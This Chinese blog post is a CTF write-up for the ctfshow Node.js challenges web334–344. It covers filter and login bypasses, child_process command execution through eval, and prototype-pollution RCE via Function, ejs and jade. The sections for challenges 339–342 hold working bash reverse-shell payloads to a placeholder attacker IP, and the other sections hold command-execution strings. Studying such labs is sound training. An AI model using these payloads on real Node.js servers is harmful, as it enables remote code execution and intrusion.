ctfshow nodejs篇

最新推荐文章于 2024-04-27 17:12:18 发布
最新推荐文章于 2024-04-27 17:12:18 发布
阅读量1k 收藏 1
点赞数
分类专栏: nodejs # ctf做题记录 文章标签: ctfshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/118808178
版权

334

源码给了 登录成功就能拿到flag
在这里插入图片描述

var express = require('express');
var router = express.Router();
var users = require('../modules/user').items;
 
var findUser = function(name, password){
  return users.find(function(item){
    return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;
  });
};

/* GET home page. */
router.post('/', function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var sess = req.session;
  var user = findUser(req.body.username, req.body.password);
 
  if(user){
    req.session.regenerate(function(err) {
      if(err){
        return res.json({ret_code: 2, ret_msg: '登录失败'});        
      }
       
      req.session.loginUser = user.username;
      res.json({ret_code: 0, ret_msg: '登录成功',ret_flag:flag});              
    });
  }else{
    res.json({ret_code: 1, ret_msg: '账号或密码错误'});
  }  
  
});

module.exports = router;

看到这里的判断逻辑
在这里插入图片描述

只要把给的用户名全改为小写就行了 登录:ctfshow 123456
在这里插入图片描述

335

在这里插入图片描述
源码里给了提示,应该是命令执行
这里直接用nodejs执行shell命令的paylaod就可以了
具体可以看官方文档 http://nodejs.cn/api/child_process.html
?eval=require('child_process').execSync('cat f*')

336

跟335一样的环境,但同样的payload打不通了 估计存在关键字过滤了
换一个方法读
?eval=require( 'child_process' ).spawnSync( 'cat', [ 'fl00g.txt' ] ).stdout.toString()
字符串拼接也可以
?eval=require('child_process')['ex'+'ecSync']('cat f*')(要url编码一下,+号会被url解析为空格)

337

源码直接给了
看这里

  if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
  	res.end(flag);
  }else{
  	res.render('index',{ msg: 'tql'});
  }

这里很简单的逻辑 用数组绕过即可
?a[]=1&b=1

338

源码里有copy函数,很明显的原型链污染
在这里插入图片描述
login.js

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');



/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var secert = {};
  var sess = req.session;
  let user = {};
  utils.copy(user,req.body);
  if(secert.ctfshow==='36dboy'){
    res.end(flag);
  }else{
    return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});  
  }
  
  
});

module.exports = router;

只要满足secert.ctfshow===‘36dboy’就能拿到flag
看到utils.copy(user,req.body)知道利用原型链污染
{"__proto__":{"ctfshow":"36dboy"}}
在这里插入图片描述

339

这题源码多了个api.js 并且原来原型链污染的地方做了点改动
api.js

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');



/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  res.render('api', { query: Function(query)(query)});
   
});

module.exports = router;

改动的地方
在这里插入图片描述
这个不太好利用了,关键在api.js文件里面,参考羽师傅的wp,有个预期解和非预期解
https://blog.csdn.net/miuzzx/article/details/111780832
这里利用变量覆盖控制query的值

function copy(object1, object2){
   for (let key in object2) {
       if (key in object2 && key in object1) {
           copy(object1[key], object2[key])
       } else {
           object1[key] = object2[key]
       }
   }
 }
var user ={}
body=JSON.parse('{"__proto__":{"query":"return 123"}}');
copy(user,body);
console.log(query);

运行上面代码可以发现query已经被赋值了
我们要利用这个原理给api.js中的query赋值
payload

{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/你的公网ip地址/端口 0>&1\"')"}}

在login路由发包,再用post方法访问/api即可反弹shell,flag在login.js里

340

跟339一个原理,但有个修改
在这里插入图片描述

只不过这次user.__proto__.___proto__才是Object,所以要向上两层
{"__proto__":{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/你的公网ip/1234 0>&1\"')"}}}

341

这题没了api.js 要用到前面339和340的非预期解
ejs的rce可以参考这篇文章ejs rce
跟340一样需要两层__proto__
payload
{"__proto__":{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/你的公网ip/1234 0>&1\"');var __tmp2"}}}

342

这题改了一下
在这里插入图片描述
原来的ejs变成了jade,不过jade也存在原型链污染
jade原型链污染
payload
{"__proto__":{"__proto__":{"type":"Code","self":1,"line":"global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/你的公网ip/1234 0>&1\"')"}}}
记得发包的时候改成application/json

343

跟342一样,虽然做了过滤,但还是可以用

344

源码很短

router.get('/', function(req, res, next) {
    res.type('html');
    var flag = 'flag_here';
    if(req.url.match(/8c|2c|\,/ig)){
        res.end('where is flag :)');
    }
    var query = JSON.parse(req.query.query);
    if(query.name==='admin'&&query.password==='ctfshow'&&query.isVIP===true){
        res.end(flag);
    }else{
        res.end('where is flag. :)');
    }
  
  });

原来?query={"name":"admin","password":"ctfshow","isVIP":true}
逗号被过滤了,用&代替 所以变成
?query={"name":"admin"&query="password":"ctfshow"&query="isVIP":true}
但2c被过滤了,双引号的url编码为%22会跟ctfshow前面的c拼接成2c,所以需要将c编码
?query={"name":"admin"&query="password":"%63tfshow"&query="isVIP":true}

fmyyy1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
nodejs初步体验
10-23
主要介绍了nodejs初步体验的相关资料,需要的朋友可以参考下
nodejs14.9.0
10-30
nodejs14.9.0
CTFshowWeb入门nodejs
Yu3511606536的博客
06-09 1169
ctfshowweb入门nodejs刷题,超详细基础
Ctfshow web入门 nodejs web334-web344
Jay17的博客
07-06 1639
Ctfshow web入门 nodejs web334-web344
CTF-Show nodejs
2301_80125214的博客
04-27 636
下载附件,有两个文件在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。所以用ctfſhow 123456登录就可以出flag了。
ctfshow—Node.js漏洞总结
cosmoslin的博客
12-27 3720
1 Js大小写绕过 ctfshow web334 下载源码 var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; }); }; 需要以账户ctfshow,密码123456登录
记ByteCTF中的Node题
WindrunnerMax
12-14 3184
记ByteCTF中的Node题 我总觉得字节是跟Node过不去了,初赛和决赛都整了个Node题目,当然PHP、Java都是必不可少的,只是我觉得Node类型的比较少见,所以感觉挺新鲜的。 Nothing 决赛的Node题型,题目如下: Can you get flag in a fully enclosed nodejs environment? http://39.106.69.116:30001 http://39.106.34.228:30001 直接访问http://39.106.34.228:
CTFshow nodejs
starttv的博客
11-19 612
​Node.js 是一个基于 Chrome V8 引擎的 Javascript 运行环境。可以说nodejs是一个运行环境,或者说是一个 JS 语言解释器而不是某种库。 Nodejs 是基于 Chrome 的 V8 引擎开发的一个 C++ 程序,目的是提供一个 JS 的运行环境。最早 Nodejs 主要是安装在服务器上,辅助大家用 JS 开发高性能服务器代码,但是后来 Nodejs 在前端也大放异彩,带来了 Web 前端开发的革命。
NodeJS-技术讲解
08-21
NodeJS 介绍与应用 Node.js 是一个基于 Chrome JavaScript 运行时建立的一个平台, Node.js 是一个事件驱动 I/O 服务端 JavaScript 环境(由 C++ 编写),基于 Google 的 V8 引擎,V8 引擎执行 JavaScript 的速度...
nodejs学习之glob
最新发布
07-10
glob学习
nodejs实现websocket
03-07
nodejs实现websocket服务端和客户端,服务端会定时发送消息到客户端 下载文件 进入文件夹根目录 运行`npm install` 运行websocket服务端`node ws.js` 运行websocket客户端`node ws-client.js`
ctfshow nodejs
qq_53263789的博客
02-09 689
前言 文档先阅读一遍 Node.js 教程 | 菜鸟教程 (runoob.com) 常见漏洞 Node.js 常见漏洞学习与总结 - 先知社区 (aliyun.com) nodejs一些入门特性&&实战 - 先知社区 (aliyun.com) 原型链污染 深入理解 JavaScript Prototype 污染攻击 | 离别歌 (leavesongs.com) 模板引擎rce XNUCA2019 Hardjs题解 从原型链污染到RCE - 先知社区 (aliyun.com) 再探 JavaS
[CTFSHOW] nodejs
Dannie01的博客
11-06 424
web 334 下载源码.zip #user.js module.exports = { items: [ {username: 'CTFSHOW', password: '123456'} ] }; var express = require('express'); var router = express.Router(); var users = require('../modules/user').items; var findUser = function(name, pas
CTFSHOW-nodejs
m0_74456293的博客
04-17 496
CTFSHOW-nodejs
ctfshow Nodejs
weixin_63231007的博客
03-08 654
承接上文nodejs原型链漏洞刷题练习
ctf刷题 ctfshow【网鼎杯】
weixin_44807430的博客
01-07 2269
纯粹学安全
ctfshow(web入门)
qq_62553635的博客
01-15 1624
第三题 根据提示直接bp抓包 发送到repeater查看响应包 得flag
CTFSHOW nodejs
羽的博客
02-18 6788
web334 在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。 在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。 所以用ctfſhow 123456登录就可以出flag了 web335 require( 'child_process' ).spawnSync( 'ls', [ '/' ] ).stdout.toString() web336 require( 'child_process' ).spawnSync( 'ls

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值